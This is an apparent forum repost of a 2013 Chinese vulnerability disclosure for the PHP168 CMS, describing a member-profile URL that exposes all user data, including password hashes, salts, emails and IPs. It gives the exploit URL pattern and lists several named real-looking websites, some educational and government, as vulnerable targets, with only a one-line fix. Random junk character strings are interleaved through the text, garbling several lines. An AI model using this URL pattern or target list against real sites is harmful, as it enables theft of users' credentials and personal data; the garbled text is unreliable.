|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile
" A( y* o _ b5 \$ c) R8 l" I) M! s4 r
以PHP168官方演示站点为例,查看任意用户信息的页面链接为:: s6 n) I% O8 Z- x4 e
2 p2 b4 d; g& phttp://php168.cn/com/homepage.php/admin/member-profile% R S! m! u& ~& v+ ?
, h$ p# e+ k$ Z& ?( x
由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。
3 U* ~* t5 _# c. Q. Mhttp://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg# z9 n* M; }( I( i8 j. K
! l/ P2 J3 t" b2 F+ t$ P 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:
j- B3 f6 f) e# z4 {2 O+ [) o9 |. w ], n" n* A
http://www.zjfzol.com.cn/homepage.php/admin/member-profile
; K+ j i& r6 t) C v1 K' n5 [
/ B0 K* a) _7 Jhttp://www.scswl.cn/homepage.php/admin/member-profile, J* N: t Z4 f& j
1 j5 Z+ F0 i3 s& X; ~0 G" o# s9 h
http://www.tunet.edu.cn/homepage.php/admin/member-profile7 A# Q* f5 J$ g- I8 q4 g
. r( w! `' s* D2 {( N1 zhttp://www.itlead.com.cn/homepage.php/admin/member-profile* c: A* x7 L' P+ S
1 K- I3 A! r: L2 Q/ J3 qhttp://www.aedp.cn/homepage.php/admin/member-profile
% L* @5 z$ {% y/ t
; E. S8 d& p4 _9 q/ ^% rhttp://www.qianlongnews.com/homepage.php/test/member-profile3 Q" x* I' W# `/ s
; P' R. W8 U$ F) V7 S
http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]
* J* _1 n, y0 F" i; I[/table] | 
发表于 2013-9-21 16:02:53
收藏
支持
反对